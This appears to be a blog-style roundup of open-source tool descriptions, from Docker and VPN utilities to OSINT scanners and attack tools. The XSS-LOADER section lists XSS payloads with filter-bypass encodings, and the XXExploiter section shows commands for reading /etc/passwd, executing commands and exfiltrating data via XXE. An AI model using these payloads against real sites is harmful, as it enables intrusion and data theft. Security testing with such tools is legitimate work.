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Lazydocker - The Lazier Way To Manage Everything Docker


A simple terminal UI for both docker and docker-compose, written in Go with the gocui library.

Minor rant incoming: Something's not working? Maybe a service is down. docker-compose ps. Yep, it's that microservice that's still buggy. No issue, I'll just restart it: docker-compose restart. Okay now let's try again. Oh wait the issue is still there. Hmm. docker-compose ps. Right so the service must have just stopped immediately after starting. I probably would have known that if I was reading the log stream, but there is a lot of clutter in there from other services. I could get the logs for just that one service with docker compose logs --follow myservice but that dies everytime the service dies so I'd need to run that command every time I restart the service. I could alternatively run docker-compose up myservice and in that terminal window if the service is down I could just up it again, but now I've got one service hogging a terminal window even after I no longer care about its logs. I guess when I want to reclaim the terminal realestate I can do ctrl+P,Q, but... wait, that's not working for some reason. Should I use ctrl+C instead? I can't remember if that closes the foreground process or kills the actual service.
What a headache!
Memorising docker commands is hard. Memorising aliases is slightly less hard. Keeping track of your containers across multiple terminal windows is near impossible. What if you had all the information you needed in one terminal window with every common command living one keypress away (and the ability to add custom commands as well). Lazydocker's goal is to make that dream a reality.


  • Docker >= 1.13 (API >= 1.25)
  • Docker-Compose >= 1.23.2 (optional)


Normally lazydocker formula can be found in the Homebrew core but we suggest you to tap our formula to get frequently updated one. It works with Linux, too.
brew install jesseduffield/lazydocker/lazydocker
brew install lazydocker

Scoop (Windows)
You can install lazydocker using scoop:
scoop install lazydocker

Binary Release (Linux/OSX/Windows)
You can manually download a binary release from the release page.
Automated install/update, don't forget to always verify what you're piping into bash:
curl https://raw.githubusercontent.com/jesseduffield/lazydocker/master/scripts/install_update_linux.sh | bash

Required Go version >= 1.8
go get github.com/jesseduffield/lazydocker

Arch Linux AUR
You can install lazydocker using your AUR package manager of choice or by running:
git clone https://aur.archlinux.org/lazydocker.git ~/lazydocker
cd ~/lazydocker
makepkg --install
A development version of the AUR package is also available

  1. Click if you have an ARM device
    • If you have a ARM 32 bit v6 architecture
      docker build -t lazyteam/lazydocker \
      --build-arg BASE_IMAGE_BUILDER=arm32v6/golang \
      --build-arg GOARCH=arm \
      --build-arg GOARM=6 \
    • If you have a ARM 32 bit v7 architecture
      docker build -t lazyteam/lazydocker \
      --build-arg BASE_IMAGE_BUILDER=arm32v7/golang \
      --build-arg GOARCH=arm \
      --build-arg GOARM=7 \
    • If you have a ARM 64 bit v8 architecture
      docker build -t lazyteam/lazydocker \
      --build-arg BASE_IMAGE_BUILDER=arm64v8/golang \
      --build-arg GOARCH=arm64 \
  2. Run the container
    docker run --rm -it -v \
    /var/run/docker.sock:/var/run/docker.sock \
    -v /yourpath:/.config/jesseduffield/lazydocker \
    • Don't forget to change /yourpath to an actual path you created to store lazydocker's config
    • You can also use this docker-compose.yml
    • You might want to create an alias, for example:
      echo "alias lzd='docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock -v /yourpath/config:/.config/jesseduffield/lazydocker lazyteam/lazydocker'" >> ~/.zshrc
For development, you can build the image using:
git clone https://github.com/jesseduffield/lazydocker.git
cd lazydocker
docker build -t lazyteam/lazydocker \
--build-arg BUILD_DATE=`date -u +"%Y-%m-%dT%H:%M:%SZ"` \
--build-arg VCS_REF=`git rev-parse --short HEAD` \
--build-arg VERSION=`git describe --abbrev=0 --tag` \
If you encounter a compatibility issue with Docker bundled binary, try rebuilding the image with the build argument --build-arg DOCKER_VERSION="v$(docker -v | cut -d" " -f3 | rev | cut -c 2- | rev)" so that the bundled docker binary matches your host docker binary version.

Call lazydocker in your terminal. I personally use this a lot so I've made an alias for it like so:
echo "alias lzd='lazydocker'" >> ~/.zshrc
(you can substitute .zshrc for whatever rc file you're using)
  • Basic video tutorial here.
  • List of keybindings here.

Cool features
everything is one keypress away (or one click away! Mouse support FTW):
  • viewing the state of your docker or docker-compose container environment at a glance
  • viewing logs for a container/service
  • viewing ascii graphs of your containers' metrics so that you can not only feel but also look like a developer
  • customising those graphs to measure nearly any metric you want
  • attaching to a container/service
  • restarting/removing/rebuilding containers/services
  • viewing the ancestor layers of a given image
  • pruning containers, images, or volumes that are hogging up disk space


How do I edit my config?
By opening lazydocker, clicking on the 'project' panel in the top left, and pressing 'o' (or 'e' if your editor is vim). See Config Docs

How do I get text to wrap in my main panel?
In the future I want to make this the default, but for now there are some CPU issues that arise with wrapping. If you want to enable wrapping, use gui.wrapMainPanel: true

How do you select text?
Because we support mouse events, you will need to hold option while dragging the mouse to indicate you're trying to select text rather than click on something. Alternatively you can disable mouse events via the gui.ignoreMouseEvents config value.
Mac Users: See Issue #190 for other options.

Why can't I see my container's logs?
By default we only show logs from the last hour, so that we're not putting too much strain on the machine. This may be why you can't see logs when you first start lazydocker. This can be overwritten in the config's commandTemplates
If you are running lazydocker in Docker container, it is a know bug, that you can't see logs or CPU usage.

  • docui - Skanehira beat me to the punch on making a docker terminal UI, so definitely check out that repo as well! I think the two repos can live in harmony though: lazydocker is more about managing existing containers/services, and docui is more about creating and configuring them.
  • Portainer - Portainer tries to solve the same problem but it's accessed via your browser rather than your terminal. It also supports docker swarm.

Sshuttle - Transparent Proxy Server That Works As A Poor Man'S VPN. Forwards Over SSH


As far as I know, sshuttle is the only program that solves the following common case:
  • Your client machine (or router) is Linux, FreeBSD, or MacOS.
  • You have access to a remote network via ssh.
  • You don't necessarily have admin access on the remote network.
  • The remote network has no VPN, or only stupid/complex VPN protocols (IPsec, PPTP, etc). Or maybe you are the admin and you just got frustrated with the awful state of VPN tools.
  • You don't want to create an ssh port forward for every single host/port on the remote network.
  • You hate openssh's port forwarding because it's randomly slow and/or stupid.
  • You can't use openssh's PermitTunnel feature because it's disabled by default on openssh servers; plus it does TCP-over-TCP, which has terrible performance.

Obtaining sshuttle
  • Debian stretch or later:
    apt-get install sshuttle
  • Arch Linux:
    pacman -S sshuttle
  • Fedora:
    dnf install sshuttle
  • NixOS:
    nix-env -iA nixos.sshuttle
  • From PyPI:
    sudo pip install sshuttle
  • Clone:
    git clone https://github.com/sshuttle/sshuttle.git
    cd sshuttle
    sudo ./setup.py install
  • FreeBSD:
    # ports
    cd /usr/ports/net/py-sshuttle && make install clean
    # pkg
    pkg install py36-sshuttle
It is also possible to install into a virtualenv as a non-root user.
  • From PyPI:
    virtualenv -p python3 /tmp/sshuttle
    . /tmp/sshuttle/bin/activate
    pip install sshuttle
  • Clone:
    virtualenv -p python3 /tmp/sshuttle
    . /tmp/sshuttle/bin/activate
    git clone https://github.com/sshuttle/sshuttle.git
    cd sshuttle
    ./setup.py install
  • Homebrew:
    brew install sshuttle
  • Nix:
    nix-env -iA nixpkgs.sshuttle

The documentation for the stable version is available at: https://sshuttle.readthedocs.org/
The documentation for the latest development version is available at: https://sshuttle.readthedocs.org/en/latest/

Chepy - A Python Lib/Cli Equivalent Of The Awesome CyberChef Tool.


Chepy is a python library with a handy cli that is aimed to mirror some of the capabilities of CyberChef. A reasonable amount of effort was put behind Chepy to make it compatible to the various functionalities that CyberChef offers, all in a pure Pythonic manner. There are some key advantages and disadvantages that Chepy has over Cyberchef. The Cyberchef concept of stacking different modules is kept alive in Chepy.
There is still a long way to go for Chepy as it does not offer every single ability of Cyberchef.

Refer to the docs for full usage information

For all usage and examples, see the docs.
Chepy has a stacking mechanism similar to Cyberchef. For example, this in Cyberchef:

This is equivalent to
from chepy import Chepy

file_path = "/tmp/demo/encoding"


Chepy vs Cyberchef

  • Chepy is pure python with a supporting and accessible python api
  • Chepy has a CLI
  • Chepy CLI has full autocompletion.
  • Supports pe, elf, and other various file format specific parsing.
  • Extendable via plugins
  • Infinitely scalable as it can leverage the full Python library.
  • Chepy can interface with the full Cyberchef web app to a certain degree. It is easy to move from Chepy to Cyberchef if need be.
  • The Chepy python library is significantly faster than the Cyberchef Node library.
  • Works with HTTP/S requests without CORS issues.

  • Chepy is not a web app (at least for now).
  • Chepy does not offer every single thing that Cyberchef does
  • Chepy does not have the magic method (at the moment)

Chepy can be installed in a few ways.

pip3 install chepy
# optionally with extra requirements
pip3 install chepy[extras]

git clone --recursive https://github.com/securisec/chepy.git
cd chepy
pip3 install -e .
# I use -e here so that if I update later with git pull, I dont have it install it again (unless dependencies have changed)

docker run --rm -ti -v $PWD:/data securisec/chepy "some string" [somefile, "another string"]

Standalone binary
One can build Chepy to be a standalone binary also. This includes packaging all the dependencies together.
git clone https://github.com/securisec/chepy.git
cd chepy
pip install .
pip install pyinstaller
pyinstaller cli.py --name chepy --onefile
The binary will be in the dist/ folder.

Check here for plugins docs
.. toctree::     :maxdepth: 3     :caption: Contents:       usage.md     examples.md     cli.rst     chepy.md     core.md     modules.rst     extras.rst     plugins.md     pullrequest.md     config.md     faq.md      Indices and tables  ==================    * :ref:`genindex`  * :ref:`modindex`  * :ref:`search`  

xShock - Shellshock Exploit


xShock ShellShock (CVE-2014-6271)
This tool exploits shellshock.

Written by Hulya Karabag
Version 1.0.0
Instagram: Capture the Root


How to use

Read Me
All founded directories will be saved in vulnurl.txt file. The results of the executed commands are saved in response.txt.

This tool include:


Installation with requirements.txt
git clone https://github.com/capture0x/xShock/
cd xShock
pip3 install -r requirements.txt

python3 main.py

Checks cgi-bin directory on the target site

This works with wordlists. Scans url on the target site. Important notice: Please enter full path of wordlist after the url.(Not file. It should be directory)
e.g: http:// targetsite.com/cgi-bin/selectedworlist
/usr/share/wordlists/dirb --> This is directory of wordlist. Not file!

By entering the url in the vuln.txt file, you can try running commands in the found urls.

Shows founded urls in vuln.txt file.

You can update proxies from web manually.

Known Issues

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with emailcapture0x@mail.com.tr
Copyright 2020

InstaSave - Python Script To Download Images, Videos & Profile Pictures From Instagram


InstaSave is a python script to download images, videos & profile pictures from Instagram without any API access.

  • Download Instagram Photos
  • Download Instagram Videos
  • Download Instagram Profile Pictures

Git Installation
# clone the repo
$ git clone https://github.com/sameera-madushan/InstaSave.git

# change the working directory to InstaSave
$ cd InstaSave

# install the requirements
$ pip3 install -r requirements.txt

python instasave.py

For your Attention
If you are downloading copyrighted content you should respect author's rights and use the content either for personal purposes or for non-commercial needs with proper mention and authorisation from the author.

Maryam v1.4.0 - Open-source Intelligence(OSINT) Framework


OWASP Maryam is an Open-source intelligence(OSINT) and Web-based Footprinting modular/tool framework based on the Recon-ng and written in Python. If you have skill in Metasploit or Recon-ng, you can easily use it without prerequisites. And if not, please read the Quick Guide.

What can be done
If you want
  • Extracts Emails, Docs, Subdomains, Social networks from search engines
  • Extracts Links, CSS and JS files, CDN links, Emails, Keywords from Web Source
  • Find and Brute force DNS, TLD and important directs
  • Crawl Web Pages and search your RegExp
  • Identify WebApps, WAF, Interesting and important files
  • And get report with several format
Use Maryam





Modules Guide
Bugs, requests, or any other issues please Contact me

XXExploiter - Tool To Help Exploit XXE Vulnerabilities


I wrote this tool to help me testing XXE vulnerabilities.
It generates the XML payloads, and automatically starts a server to serve the needed DTD's or to do data exfiltration.
IMPORTANT: This tool is still under development and although most of its features are already working, some may have not been tested properly.

Building & Running
This is a simple Node application written with typescript. So you can build it as you build other apps:
(install node and npm first, if you dont have them)
npm install  
npm run build
#you may need to npm install tsc -g in order for 'npm build' to success
To run the app you can do it with one of two ways:
npm start [args]  
node dist/index.js [args]
Again, this is still under development. Soon i'll deploy the npm package to you can install it globally.

Usage: index.js [command] [options]  

index.js file [file_to_read] Use XXE to read a file
index.js request [URL] Use XXE to do a request
index.js expect [command] Use XXE to execute a command through PHP's
index.js xee [expantions] Generate a huge content by resolving entities

--version Show version number
-s, --server Server address for OOB and DTD
-p, --port Server port for OOB. Default: 7777
-t, --template path to an XML template where to inject payload
-m, --mode Extraction Mode: xml, oob, cdata. Default: xml
-e, --encode Extraction Encoding: none, phpbase64. Default: none
-o, --output Output for the XML payload file. Default is to console
-x Use a request to automatically send the xml file
-h, --help Show help

index.js expect ls
index.js -s expect ls -e phpbase64 -m oob -o output.xml
index.js -s file /c/windows/win.ini -t xmltemplate.xml -m oob
index.js xee 900000000 -o output.xml
index.js file /etc/passwd -x request.txt -t template.xml

Extra Info:
- When using the xml or cdata modes, add the placeholder '{{XXE}}' in the
field where you want the entity content to be injected
- When specifiying file paths for windows the format should be as:
/c:/windows/win.ini (Notice the first slash).
- OOB: Out Of Bo und: You can use this option to send the data processed by the
xml parser, to your local webserver. Usefull with blind attacks
- When using XML mode, it may break the XML parsing if XML reserved characters
are loaded
- When using the request option, you can specify the placeholder to inject the
payload with {{XXE}} or {{XXE_B64}}
There are basically 4 main commands:
  • file - to read local files
  • request - do SSRF attack, to make requests from the target machine
  • expect - Use PHP expect to execute commands, if your target is a PHP app
  • XEE - Just do parameter expansions to try to cause a DOS.

Some notes:
If you choose to use OOB or CDATA mode, XXExploiter will generate the necessary dtd to be included, and will start a server to host them. Have in mind that if you use these options you should set the server address
If you include content in the body of the XML have in mind that XML restricted characters like '<' may break the parsing so be sure to use CDATA or PHP's base64encode
Most of languages limit the number of entity expantions, or the total length of the content expanded, so make sure you test XEE on your machine first, with the same conditions as the target

Sometimes we need to send XML with specific fields to be able to exploit a vulnerability. So in order to help, I've introduced the -t (--template) option.
You can create a regular XML file to be used to generate the malicious payload.
If you want to add the content of a request or a file read in the content of this file, you can place the placeholder {{XXE}} where you want that to be.
There may be some limitations right now with this option, if you send an XML template with a DOCTYPE field.

After all this automation it would be boring to have to manually send the XML file to the server right?
Yeah, so I created a really nice option (-x) to automatically do it for you.
You can use a request that you grab for example from Burp, and use it here. (Note that the -x options wants a file)
In the place where you want the XML content to be injected you can add the placeholder {{XXE}} or if you need it encoded in b64 (yeah, i needed it once) use {{XXE_B64}}

uDork - Google Hacking Tool


uDork is a script written in Python that uses advanced Google search techniques to obtain sensitive information in files or directories, find IoT devices, detect versions of web applications, and so on.
uDork does NOT make attacks against any server, it only uses predefined dorks and/or official lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database).

Author: M3n0sD0n4ld
Twitter: @David_Uton

You need to have goop installed
pip3 install goop

Download and install:
$ git clone https://github.com/m3n0sd0n4ld/uDork
$ cd uDork
- Open the file and write inside this line:
$ python3 uDork.py -h

  • For the tool to work, you must configure uDork with your Facebook cookie in the file cookie.py.
  • You must also be logged in to Facebook on the computer you are using uDork WITHOUT logging out.

Steps to obtain the cookie and configure the cookie
  • Login to facebook.com
  • Press in your browser control + shift + K (Firefox) o control + shift + J (Google Chrome) to go to console.
  • Write document.cookie in the console and copy the cookies "c_user = content" and "xs = content" to the variable "cookie" inside the file "cookie.py""
cookie = 'c_user=XXXXXX; xs=XXXXXX'
Note: If the "xs" cookie does not appear, follow these steps.
  • Save and remember, you must NOT log out of Facebook or you will have to do these steps again.


$ python3 uDork.py -h
_____ _
| __ \ | |
_ _| | | | ___ _ __| | __
| | | | | | |/ _ \| '__| |/ /
| |_| | |__| | (_) | | | <
\__,_|_____/ \___/|_| |_|\_\ v.2020.03.13
by M3n0sD0n4ld - (@David_Uton)

usage: uDork.py [-h] [-d DOMAIN] [-e EXTENSION] [-t TEXT] [-s STRING]
[-m MASSIVE] [-l LIST] [-f FILE] [-k DORK] [-p PAGES]

optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain or IP address.
Search files by extension. Use 'all' to find the list
-t TEXT, --text TEXT Find text in website content.
-s STRING, -- string STRING
Locate text strings within the URL.
-m MASSIVE, --massive MASSIVE
Attack a site with a predefined list of dorks. Review
list <-l / - list>
-l LIST, --list LIST Shows the list of predefined dorks (Exploit-DB).
-f FILE, --file FILE Use your own personalized list of dorks.
-k DORK, --dork DORK Specifies the type of dork <filetype | intext | inurl>
(Required for '<-f / - file'>).
-p PAGES, --pages PAGES
Number of pages to search in Google. (By default 5
-o OUTPUT, --output OUTPUT
Export results to a file.

Example of searching pdf files
$ python3 uDork.py -d nasa.gov -e pdf

_____ _
| __ \ | |
_ _| | | | ___ _ __| | __
| | | | | | |/ _ \| '__| |/ /
| |_| | |__| | (_) | | | <
\__,_|_____/ \___/|_| |_|\_\ v.2020.03.13
by M3n0sD0n4ld - (@David_Uton)

[!] The results will appear below. This may take several minutes, please wait ...
Domain/IP: nasa.gov
Find links with: pdf
https://www.nasa.gov/pdf/220260main_Workforce_Transition_Strategy_briefing .pdf

Example of searching routes with the word "password"
$ python3 uDork.py -d nasa.gov -s password

_____ _
| __ \ | |
_ _| | | | ___ _ __| | __
| | | | | | |/ _ \| '__| |/ /
| |_| | |__| | (_) | | | <
\__,_|_____/ \___/|_| |_|\_\ v.2020.03.13
by M3n0sD0n4ld - (@David_Uton)

[!] The results will appear below. This may take several minutes, please wait ...
Domain/IP: nasa.gov
Find links with: password
htt ps://www.nas.nasa.gov/hecc/support/kb/password-creation-rules_270.html
https://answers.nssc. nasa.gov/app/answers/list/search/1/kw/Password/search/1

Dorks listing
$ python3 uDork.py -l list

_____ _
| __ \ | |
_ _| | | | ___ _ __| | __
| | | | | | |/ _ \| '__| |/ /
| |_| | |__| | (_) | | | <
\__,_|_____/ \___/|_| |_|\_\ v.2020.03.13
by M3n0sD0n4ld - (@David_Uton)


======================== DORKS LISTING ========================
admin : Access panels of all kinds (administration, login, CMS, ...)
directories : Sensitive directories (drupal, wordpress, phpmyadmin ...)
usernames : Find files containing user names.
passwords : Find files that contain passwords .
webservers: Find web servers.
vulnerable_files : Find vulnerable files.
vulnerable_servers : Find vulnerable servers.
error_messages : Show error messages.
vulnerable_networks : Find software data on vulnerable networks.
portal_logins : List portal logins.
devices : Find connected devices (printers, webcams, thermostats, ...)

Example of use Dorks Massive
$ python3 uDork.py -d nasa.gov -m admin -p 3 -o report.txt

_____ _
| __ \ | |
_ _| | | | ___ _ __| | __
| | | | | | |/ _ \| '__| |/ /
| |_| | |__| | (_) | | | <
\__,_|_____/ \___/|_| |_|\_\ v.2020.03.13
by M3n0sD0n4ld - (@David_Uton)

[!] The results will appear below. This may take several minutes, please wait ...
Domain/IP: nasa.gov
Find links with: ADMIN/

https://dartslab.jpl.nasa.go v/qa/user/admin
Domain/IP: nasa.gov
Find links with: AdminTools/

Domain/IP: nasa.gov
Find links with: Server.html



Thank s0md3v for goop, very good job! https://github.com/s0md3v/goop

HTTPS Everywhere - A Browser Extension That Encrypts Your Communications With Many Websites That Offer HTTPS But Still Allow Unencrypted Connections


A browser extension that encrypts your communications with many websites that offer HTTPS but still allow unencrypted connections.

Getting Started
Get the packages you need and install a git hook to run tests before push:
bash install-dev-dependencies.sh
Run the ruleset validations and browser tests:
bash test.sh
Run the latest code and rulesets in a standalone Firefox profile:
bash test/firefox.sh --justrun
Run the latest code and rulesets in a standalone profile for a specific version of Firefox:
FIREFOX=/path/to/firefox bash test/firefox.sh --justrun
Run the latest code and rulesets in a standalone Chromium profile:
bash test/chromium.sh --justrun
Run the latest code and rulesets in a standalone Tor Browser profile:
bash test/tor-browser.sh path_to_tor_browser.tar.xz
Build the Firefox (.xpi) & Chromium (.crx) extensions:
bash make.sh
Both of the build commands store their output under pkg/.

Precommit Testing
One can run the available test suites automatically by enabling the precommit hook provided with:
ln -s ../../hooks/precommit .git/hooks/pre-commit

Source Tree
This is the source tree for HTTPS Everywhere for Firefox and Chrome.
Important directories you might want to know about
chromium/                 WebExtension source code (for Firefox & Chromium/chrome)
chromium/external External dependencies
chromium/test Unit tests

rules/ Symbolic link to src/chrome/content/rules

src/chrome/content/rules Ruleset files live here

test/ Travis unit test source code live here

utils/ Various utilities (includes some Travis test source)

Hacking on the Source Code
Please refer to our contributing document to contribute to the project.
This project is governed by EFF's Public Projects Code of Conduct.

Astra - Automated Security Testing For REST API's


REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.
  • SQL injection
  • Cross site scripting
  • Information Leakage
  • Broken Authentication and session management
  • CSRF (including Blind CSRF)
  • Rate limit
  • CORS misconfiguration (including CORS bypass techniques)
  • JWT attack
  • CRLF detection
  • Blind XXE injection


  • Linux or MacOS
  • Python 2.7
  • mongoDB

$ git clone https://github.com/flipkart-incubator/Astra

$ cd Astra

$ sudo pip install -r requirements.txt

Docker Installation

Run Mongo Container:
$ docker pull mongo
$ docker run --name astra-mongo -d mongo

Installing GUI Docker:
$ git clone https://github.com/flipkart-incubator/Astra.git
$ cd Astra
$ docker build -t astra .
$ docker run --rm -it --link astra-mongo:mongo -p 8094:8094 astra

Installing CLI Docker :
$ git clone -b docker-cli https://github.com/flipkart-incubator/Astra.git
$ cd Astra
$ docker build -t astra-cli .
$ docker run --rm -it --link astra-mongo:mongo astra-cli

- requests
- logger
- pymongo
- ConfigParser
- pyjwt
- flask
- sqlmap


Usage: CLI
$ python astra.py --help

/\ | |
/ \ ___| |_ _ __ __ _
/ /\ \ / __| __| '__/ _` |
/ ____ \__ \ |_| | | (_| |
/_/ \_\___/\__|_| \__,_|

usage: astra.py [-h] [-c {Postman,Swagger}] [-n COLLECTION_NAME] [-u URL]
[-headers HEADERS] [-method {GET,POST}] [-b BODY]

REST API Security testing Framework

optional arguments:
-h, --help show this help message and exit
-c {Postman,Swagger}, --collection_type {Postman,Swagger}
Type of API collection
Type of API collection
-u URL, --url URL URL of target API
-headers HEADERS, --headers HEADERS
Custom headers.Example: {"token" : "123"}
-met hod {GET,POST}, --method {GET,POST}
HTTP request method
-b BODY, --body BODY Request body of API
-l LOGINURL, --loginurl LOGINURL
URL of login API
Headers should be in a dictionary format. Example:
{"accesstoken" : "axzvbqdadf"}
login data of API

Usage: Web interface
Run the api.py and access the web interface at
$ cd API
$ python api.py


New scan

Scan Reports

Detailed Report

Lead Developer
  • Sagar Popat (@popat_sagar)

  • Ankur Bhargava
  • Harsh Grover
  • Flipkart security team
  • Pardeep Battu

ScoringEngine - Scoring Engine For Red/White/Blue Team Competitions


Scoring Engine for Red/White/Blue Team Competitions

Getting started
Download Docker. If you are on Mac or Windows, Docker Compose will be automatically installed. On Linux, make sure you have the latest version of Compose. If you're using Docker for Windows on Windows 10 pro or later, you must also switch to Linux< /a> containers.
Run in this directory:
docker-compose build
docker-compose up
If you want to delete the database before starting, set the SCORINGENGINE_OVERWRITE_DB environment variable:
SCORINGENGINE_OVERWRITE_DB=true docker-compose up
We also provide the ability to run it in an 'example' mode. This means only the web ui runs, and the database is prepopulated with example data. Set the SCORINGENGINE_EXAMPLE environment variable to true:
SCORINGENGINE_EXAMPLE=true docker-compose up
The app will be running at http://localhost
Log in with any of the following logins at http://localhost:
  • whiteteamuser:testpass
  • team1user1:testpass
  • team2user1:testpass
  • team2user2:testpass
  • redteamuser:testpass


FinalRecon v1.0.2 - OSINT Tool For All-In-One Web Reconnaissance


FinalRecon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be added with ease.

FinalRecon provides detailed information such as :
  • Header Information
  • Whois
  • SSL Certificate Information
  • Crawler
  • DNS Enumeration
    • A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
    • DMARC Records
  • Subdomain Enumeration
    • Data Sources
      • BuffOver
      • crt.sh
      • ThreatCrowd
      • AnubisDB
      • ThreatMiner
  • Traceroute
    • Protocols
      • UDP
      • TCP
      • ICMP
  • Directory Searching
  • Port Scan
    • Fast
    • Top 1000 Ports
    • Open Ports with Standard Services
  • Export
    • Formats
      • txt
      • xml
      • csv


Header Information


SSL Certificate Details

Found Flag in SSL Certificate - Securinets CTF Quals 2019 - Hidden (200 Points)


DNS Enumeration

HackTheBox OSINT Challenge

Subdomain Enumeration


Directory Searching

Port Scan

Tested on
  • Kali Linux 2019.1
  • BlackArch Linux

git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt

python3 finalrecon.py -h

usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub] [--trace] [--dir] [--ps]
[--full] [-t T] [-T T] [-w W] [-r] [-s] [-d D] [-m M] [-p P] [-tt TT] [-o O]

FinalRecon - OSINT Tool for All-In-One Web Recon | v1.0.2

positional arguments:
url Target URL

optional arguments:
-h, --help show this help message and exit
--headers Header Information
--sslinfo SSL Certificate Information
--whois Whois Lookup
--crawl Crawl Target
--dns DNS Enumeration
--sub Sub-Domain Enumeration
--trace Traceroute
--dir Directory Search
--ps Fast Port Scan
--full Full Recon

Extra Options:
-t T Number of Threads [ Default : 50 ]
-T T Request Timeout [ Default : 10.0 ]
-w W Path t o Wordlist [ Default : wordlists/dirb_common.txt ]
-r Allow Redirect [ Default : False ]
-s Toggle SSL Verification [ Default : True ]
-d D Custom DNS Servers [ Default : ]
-m M Traceroute Mode [ Default : UDP ] [ Available : TCP, ICMP ]
-p P Port for Traceroute [ Default : 80 / 33434 ]
-tt TT Traceroute Timeout [ Default : 1.0 ]
-o O Export Output [ Default : txt ] [ Available : xml, csv ]
# Check headers

python3 finalrecon.py --headers <url>

# Check ssl Certificate

python3 finalrecon.py --sslinfo <url>

# Check whois Information

python3 finalrecon.py --whois <url>

# Crawl Target

python3 finalrecon.py --crawl <url>

# full scan

python3 finalrecon.py --full <url>


Starkiller - A Frontend For PowerShell Empire


Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide.

Getting Started
  • To run Starkiller, you can download the installers for Mac, Linux, and Windows on the Releases page.
  • If you want to build from source or run in development mode, instructions are below.

  • Node.js 10+.
  • Yarn Currently it has been tested using Yarn 1.22.0.
yarn install

Compile and hot-reload for development
yarn electron:serve

Compile and minify for production
yarn electron:build

# Or to target a specific OS.
yarn electron:build:lin
yarn electron:build:win
yarn electron:build:mac

Detailed changes for each release are documented in the release notes.

Stay In Touch

XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


Written by Hulya Karabag
Instagram: Hulya Karabag


How to use

Read Me
  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter


Installation with requirements.txt
git clone https://github.com/capture0x/XSS-LOADER/
pip3 install -r requirements.txt

python3 payloader.py


*Basic Payload
Sets default parameter to :<script>alert(1)</script>

*Div Payload
Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload
Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload
Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload
Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload
Encodes payload writed by user

*Payload Generator Parameter
Encodes payload on selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* | 2. UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> &lt;script&gt;alert(1)&lt;/script&gt;
* | 5. SPLIT PAYLOAD -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 1 2. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> <script>alert`1`</script>
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* | 19. INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* | 20. MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* | 22. SPACE BYPASS-----> <img^Lsrc=x^ Lonerror=alert('1');>
* | 23. DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* | 27. ALERT PAYLOADS-----> Show Alert Payload List
* | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads
* | 30. EXIT

*Xss Scanner
Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list
  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)
Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder
First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with email capture0x@mail.com.tr
Copyright 2020

